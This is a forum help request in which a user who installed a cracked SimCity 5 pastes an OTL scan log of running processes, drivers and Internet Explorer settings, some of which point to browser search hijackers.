Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

I think my PC got infected by Razor1911 [Closed] [Solved]

Started by langvu900 , Aug 09 2014 11:06 AM

razor1911 sim city 5 infection

This topic is locked

#1
langvu900

Posted 09 August 2014 - 11:06 AM

Member

Member
11 posts

Hello, i downloaded sim city 5 cracked by Razor1911, and i think my computer got infected (a page told me that my PC ID-address is spam). I read the instruction and here is my OTL.txt file. Please help and thank you!

OTL logfile created on: 09.08.2014 23:08:16 - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\Programs

64bit- Home Premium Edition (Version = 6.1.7600) - Type = NTWorkstation

Internet Explorer (Version = 9.0.8112.16421)

Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

3,68 Gb Total Physical Memory | 1,77 Gb Available Physical Memory | 48,16% Memory free

7,35 Gb Paging File | 4,87 Gb Available in Paging File | 66,21% Paging File free

Paging file location(s): c:\pagefile.sys 0 0 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)

Drive C: | 685,54 Gb Total Space | 255,31 Gb Free Space | 37,24% Space Free | Partition Type: NTFS

Computer Name: FAMILIE-LE-NB | User Name: Papa | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2014.08.09 22:34:14 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\Programs\OTL.exe

PRC - [2014.08.06 16:34:34 | 013,246,272 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe

PRC - [2014.08.06 16:34:34 | 005,052,224 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe

PRC - [2014.08.06 16:21:00 | 000,229,696 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe

PRC - [2014.07.18 18:44:10 | 003,890,208 | ---- | M] (AVAST Software) -- C:\Programme\Alwil Software\Avast5\avastui.exe

PRC - [2014.04.17 21:07:28 | 004,672,920 | ---- | M] (Akamai Technologies, Inc.) -- C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Akamai\netsession_win.exe

PRC - [2014.01.20 17:29:42 | 000,142,200 | ---- | M] (Itim Technologies Co., Ltd.) -- C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\1.3.39.7\CocCocCrashHandler.exe

PRC - [2013.11.26 11:24:43 | 000,500,696 | ---- | M] (CyberLink Corp.) -- C:\Program Files (x86)\Cyberlink\YouCam6\YouCamService6.exe

PRC - [2013.11.22 15:58:40 | 002,033,016 | ---- | M] (NCT Corporation) -- C:\Program Files (x86)\NhacCuaTui\1.0.6.27\NhacCuaTui.exe

PRC - [2013.10.30 10:37:18 | 000,139,312 | ---- | M] (VNPT-CA) -- C:\Program Files (x86)\VNPT-CA\VNPT-CA CL Token Manager v1\vnpt-ca_cl_v1_certd.exe

PRC - [2013.09.27 03:19:28 | 005,474,816 | ---- | M] (i-Funbox.com) -- C:\Program Files (x86)\iFunbox 2013\iFunBox2013.exe

PRC - [2013.06.20 18:54:26 | 003,604,048 | ---- | M] (Tonec Inc.) -- C:\Program Files (x86)\Internet Download Manager\IDMan.exe

PRC - [2013.06.07 04:59:45 | 001,925,656 | ---- | M] (Aeria Games & Entertainment) -- C:\Program Files (x86)\Aeria Games\Ignite\aeriaignite.exe

PRC - [2012.12.12 20:44:48 | 000,268,248 | ---- | M] (Tonec Inc.) -- C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe

PRC - [2012.10.23 08:34:36 | 000,757,368 | ---- | M] (Samsung) -- C:\Programme\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkDMS.exe

PRC - [2010.03.18 11:19:26 | 000,113,152 | ---- | M] (ArcSoft Inc.) -- C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe

PRC - [2010.03.04 10:16:06 | 000,013,336 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe

PRC - [2010.03.04 10:16:04 | 000,284,696 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe

PRC - [2009.01.05 05:39:43 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Programme\Alwil Software\Avast5\AvastSvc.exe

========== Modules (No Company Name) ==========

MOD - [2014.04.23 16:05:12 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll

MOD - [2014.04.23 16:04:54 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

MOD - [2014.04.23 16:04:54 | 000,237,384 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll

MOD - [2013.09.05 00:14:10 | 004,300,456 | ---- | M] () -- C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf

MOD - [2013.05.02 19:00:50 | 001,218,560 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\2024a7339aa5ad2712d239d454d3c355\System.Management.ni.dll

MOD - [2013.05.02 18:58:59 | 000,787,456 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.EnterpriseSe#\d340a103e8f063a3771cbeaaec58d157\System.EnterpriseServices.ni.dll

MOD - [2013.05.02 18:58:59 | 000,236,032 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.EnterpriseSe#\d340a103e8f063a3771cbeaaec58d157\System.EnterpriseServices.Wrapper.dll

MOD - [2013.05.02 18:58:58 | 000,649,728 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\9253eb314ef2f5adada0d5fdf1d4a839\System.Transactions.ni.dll

MOD - [2013.05.02 18:58:56 | 002,647,040 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runtime.Seri#\48ee0e1de873152ec7e85d7456c1cc09\System.Runtime.Serialization.ni.dll

MOD - [2013.05.02 18:58:08 | 001,801,728 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\cbb7db665b3ba25a931258eb702527f5\System.Xaml.ni.dll

MOD - [2013.05.02 18:53:50 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\01b47a246b4ec7bfec31bf4503aceda1\System.Runtime.Remoting.ni.dll

MOD - [2013.05.02 18:53:49 | 003,325,952 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\82a4c4666ad83c3a375210247e69646b\WindowsBase.ni.dll

MOD - [2013.05.02 18:53:46 | 000,452,608 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\dd2d0cf72eac6e5b113a0059aeb3cab5\IAStorUtil.ni.dll

MOD - [2013.05.02 18:53:44 | 012,433,920 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\05682429807d34d6ff05a77ea153935f\System.Windows.Forms.ni.dll

MOD - [2013.05.02 18:53:37 | 001,592,832 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\e2ee5d77ebe0bd025e7a7a317a43d677\System.Drawing.ni.dll

MOD - [2013.05.02 18:53:13 | 005,453,312 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\10aba2c167cc1119b80159fd9ac71ca8\System.Xml.ni.dll

MOD - [2013.05.02 18:53:09 | 000,971,264 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\96a3b737db1e72adaf32d2b350e50c23\System.Configuration.ni.dll

MOD - [2013.05.02 18:53:08 | 007,974,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\c54750e64ba10d0fb7b6a636fb3695ca\System.ni.dll

MOD - [2013.05.02 18:53:02 | 011,490,816 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\b0b8554c05f194f546a8ed531320760b\mscorlib.ni.dll

MOD - [2013.05.02 03:16:33 | 018,002,944 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationFramewo#\f28a346ae10e2eec581608f591cf7116\PresentationFramework.ni.dll

MOD - [2013.05.02 03:16:29 | 013,199,360 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\806c4ba7d696ab586ffd774a31f1a66b\System.Windows.Forms.ni.dll

MOD - [2013.05.02 03:16:21 | 006,815,232 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8167f7d08668a5859e76aa9a1124a42f\System.Data.ni.dll

MOD - [2013.05.02 03:16:20 | 001,667,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\b83993cc955262507c8ead67567c8060\System.Drawing.ni.dll

MOD - [2013.05.02 03:16:18 | 000,595,968 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationFramewo#\7d6b122bee0977d953ee2409d74c3c25\PresentationFramework.Aero.ni.dll

MOD - [2013.05.02 03:14:42 | 011,451,904 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\8983c040161b34c64474f195bff5e2de\PresentationCore.ni.dll

MOD - [2013.05.02 03:14:31 | 003,858,944 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\5dbabea688adfc665e3453561736699a\WindowsBase.ni.dll

MOD - [2013.05.02 03:14:21 | 005,617,664 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\d884c684ee3f738a60e3c50dd5d88caa\System.Xml.ni.dll

MOD - [2013.05.02 03:14:18 | 000,982,528 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\cb72ac8478a5ea7e2d570bb710ecb1c1\System.Configuration.ni.dll

MOD - [2013.05.02 03:14:15 | 007,069,696 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\08bebcf66ad666dfdf2a4a934d79c0f9\System.Core.ni.dll

MOD - [2013.05.02 03:14:09 | 009,094,656 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\df418085cedae9fa2efee87e20a419a4\System.ni.dll

MOD - [2013.05.02 03:14:03 | 014,413,824 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\60c214b6ad5691e368a16ec65d127c27\mscorlib.ni.dll

MOD - [2010.09.19 09:03:53 | 000,315,392 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_de_b77a5c561934e089\mscorlib.resources.dll

MOD - [2009.01.05 05:39:52 | 019,336,120 | ---- | M] () -- C:\Programme\Alwil Software\Avast5\libcef.dll

========== Services (SafeList) ==========

SRV:64bit: - File not found [Auto | Stopped] -- C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe -- (btwdins)

SRV:64bit: - [2010.04.21 06:34:40 | 000,202,752 | ---- | M] (AMD) [Auto | Running] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility)

SRV - [2014.08.06 16:34:34 | 005,052,224 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe -- (TeamViewer9)

SRV - [2014.02.26 04:57:46 | 000,568,512 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)

SRV - [2013.10.23 08:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)

SRV - [2012.10.23 09:15:52 | 000,408,184 | ---- | M] (Samsung) [Auto | Running] -- C:\Programme\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkManagerDMS.exe -- (AllShare Framework DMS)

SRV - [2012.07.17 15:14:44 | 002,292,480 | ---- | M] (Microsoft Corp.) [Auto | Running] -- C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE -- (wlidsvc)

SRV - [2010.03.18 13:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)

SRV - [2010.03.18 11:19:26 | 000,113,152 | ---- | M] (ArcSoft Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe -- (ACDaemon)

SRV - [2010.03.04 10:16:06 | 000,013,336 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)

SRV - [2010.01.10 03:34:24 | 004,925,184 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Programme\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)

SRV - [2010.01.10 03:20:56 | 000,174,440 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Programme\Common Files\Microsoft Shared\Source Engine\OSE.EXE -- (ose64)

SRV - [2009.10.01 00:34:22 | 002,314,240 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)

SRV - [2009.06.11 04:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)

SRV - [2009.01.05 05:39:43 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Programme\Alwil Software\Avast5\AvastSvc.exe -- (avast! Antivirus)

========== Driver Services (SafeList) ==========

DRV:64bit: - [2014.01.04 18:22:21 | 000,868,848 | ---- | M] (Duplex Secure Ltd.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\sptd.sys -- (sptd)

DRV:64bit: - [2013.10.29 14:26:19 | 000,041,704 | ---- | M] (CyberLink Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\clwvd6.sys -- (clwvd6)

DRV:64bit: - [2013.05.25 22:00:14 | 000,168,288 | ---- | M] (Tonec Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\idmwfp.sys -- (IDMWFP)

DRV:64bit: - [2013.03.18 16:51:08 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)

DRV:64bit: - [2013.02.05 22:06:06 | 000,057,840 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)

DRV:64bit: - [2013.01.20 16:12:40 | 000,314,016 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\atksgt.sys -- (atksgt)

DRV:64bit: - [2013.01.20 16:12:40 | 000,043,680 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\lirsgt.sys -- (lirsgt)

DRV:64bit: - [2012.08.21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)

DRV:64bit: - [2012.03.01 13:54:38 | 000,022,896 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)

DRV:64bit: - [2011.03.11 13:22:41 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)

DRV:64bit: - [2011.03.11 13:22:40 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)

DRV:64bit: - [2010.09.21 09:07:08 | 000,312,184 | ---- | M] () [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ArcSec.sys -- (ArcSec)

DRV:64bit: - [2010.04.28 13:21:38 | 000,018,432 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NTIDrvr.sys -- (NTIDrvr)

DRV:64bit: - [2010.04.28 13:21:38 | 000,017,408 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UBHelper.sys -- (UBHelper)

DRV:64bit: - [2010.04.21 08:15:04 | 006,406,144 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atipmdag.sys -- (amdkmdag)

DRV:64bit: - [2010.04.21 05:39:36 | 000,188,928 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap)

DRV:64bit: - [2010.04.21 05:08:04 | 010,322,848 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdpmd64.sys -- (intelkmd)

DRV:64bit: - [2010.04.08 03:12:02 | 000,124,944 | ---- | M] (ATI Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AtiHdmi.sys -- (AtiHdmiService)

DRV:64bit: - [2010.04.07 09:04:22 | 002,216,960 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)

DRV:64bit: - [2010.04.01 15:18:30 | 003,060,800 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BCMWL664.SYS -- (BCM43XX)

DRV:64bit: - [2010.03.05 17:04:08 | 000,335,400 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwampfl.sys -- (btwampfl)

DRV:64bit: - [2010.03.04 09:51:40 | 000,540,696 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)

DRV:64bit: - [2010.03.01 22:37:40 | 000,039,464 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwl2cap.sys -- (btwl2cap)

DRV:64bit: - [2010.02.22 22:41:42 | 000,121,344 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ZTEusbser6k.sys -- (ZTEusbser6k)

DRV:64bit: - [2010.02.22 22:41:42 | 000,121,344 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ZTEusbnmea.sys -- (ZTEusbnmea)

DRV:64bit: - [2010.02.22 22:41:42 | 000,121,344 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ZTEusbmdm6k.sys -- (ZTEusbmdm6k)

DRV:64bit: - [2010.02.15 03:05:12 | 000,102,440 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwaudio.sys -- (btwaudio)

DRV:64bit: - [2010.01.13 22:41:12 | 000,135,720 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwavdt.sys -- (btwavdt)

DRV:64bit: - [2010.01.13 22:41:06 | 000,021,544 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwrchid.sys -- (btwrchid)

DRV:64bit: - [2009.12.28 20:52:12 | 000,012,800 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\massfilter.sys -- (massfilter)

DRV:64bit: - [2009.12.22 08:18:48 | 000,074,280 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\L1C62x64.sys -- (L1C)

DRV:64bit: - [2009.10.26 11:39:44 | 000,151,936 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Impcd.sys -- (Impcd)

DRV:64bit: - [2009.10.05 10:08:44 | 000,087,600 | ---- | M] (Citrix Systems, Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ctxusbm.sys -- (ctxusbm)

DRV:64bit: - [2009.09.17 19:12:06 | 000,292,912 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)

DRV:64bit: - [2009.09.17 17:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)

DRV:64bit: - [2009.07.14 08:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)

DRV:64bit: - [2009.07.14 08:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)

DRV:64bit: - [2009.07.14 08:47:48 | 000,077,888 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)

DRV:64bit: - [2009.07.14 08:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)

DRV:64bit: - [2009.07.14 07:35:32 | 000,012,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)

DRV:64bit: - [2009.06.17 23:54:46 | 000,040,976 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\LUsbFilt.sys -- (LUsbFilt)

DRV:64bit: - [2009.06.17 23:54:30 | 000,057,872 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\LMouFilt.Sys -- (LMouFilt)

DRV:64bit: - [2009.06.17 23:54:22 | 000,055,312 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\LHidFilt.Sys -- (LHidFilt)

DRV:64bit: - [2009.06.11 03:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)

DRV:64bit: - [2009.06.11 03:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)

DRV:64bit: - [2009.06.11 03:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)

DRV:64bit: - [2009.06.11 03:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)

DRV:64bit: - [2009.06.03 09:15:30 | 000,060,464 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDVDisk.sys -- (mwlPSDVDisk)

DRV:64bit: - [2009.06.03 09:15:30 | 000,022,576 | ---- | M] (Egis Technology Inc.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDFilter.sys -- (mwlPSDFilter)

DRV:64bit: - [2009.06.03 09:15:30 | 000,020,016 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDNserv.sys -- (mwlPSDNServ)

DRV:64bit: - [2009.05.26 20:32:38 | 000,040,448 | ---- | M] (Alcor Micro, Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AmUStor.sys -- (AmUStor)

DRV:64bit: - [2009.04.09 19:38:26 | 000,167,424 | ---- | M] (ZTE Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ZTEusbnet.sys -- (ZTEusbnet)

DRV:64bit: - [2009.04.09 19:38:26 | 000,150,784 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\zteusbvoice.sys -- (ZTEusbvoice)

DRV:64bit: - [2009.02.03 22:00:04 | 000,012,800 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\massfilter_hs.sys -- (massfilter_hs)

DRV:64bit: - [2009.01.12 00:07:54 | 001,039,096 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsnx.sys -- (aswSnx)

DRV:64bit: - [2009.01.12 00:07:54 | 000,423,240 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsp.sys -- (aswSP)

DRV:64bit: - [2009.01.12 00:07:54 | 000,085,328 | ---- | M] (AVAST Software) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswstm.sys -- (aswStm)

DRV:64bit: - [2009.01.05 05:39:58 | 000,208,416 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswVmm.sys -- (aswVmm)

DRV:64bit: - [2009.01.05 05:39:58 | 000,065,776 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswRvrt.sys -- (aswRvrt)

DRV:64bit: - [2009.01.05 05:39:57 | 000,093,568 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswRdr2.sys -- (aswRdr)

DRV:64bit: - [2009.01.05 05:39:57 | 000,079,184 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\aswMonFlt.sys -- (aswMonFlt)

DRV:64bit: - [2009.01.05 05:39:57 | 000,029,208 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswHwid.sys -- (aswHwid)

DRV - [2013.11.27 06:00:30 | 000,086,352 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\AeriaGames\AuraKingdom\avital\hxsy64.sys -- (hxsyol)

DRV - [2010.01.29 11:40:16 | 000,115,600 | ---- | M] (EZB Systems, Inc.) [File_System | System | Running] -- C:\Program Files (x86)\UltraISO\drivers\ISODrv64.sys -- (ISODrive)

DRV - [2009.07.14 08:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s

IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://start.mysearc...=1727878116&ir=

IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}

IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC

IE:64bit: - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://start.mysearc...=1727878116&ir=

IE - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC

IE - HKLM\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = http://www.google.co...ng}&rlz=1I7ACAW

IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7

IE - HKLM\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = http://websearch.wis...&cc=VN&unqvl=39

IE - HKLM\..\SearchScopes\{E627DC4B-8C04-4234-A2D4-1D634EE01C41}: "URL" = http://www.bigseekpr...q={searchTerms}

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,bProtector Start Page = http://visualbee.del...121377&tsp=5004

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.shb.com.vn/

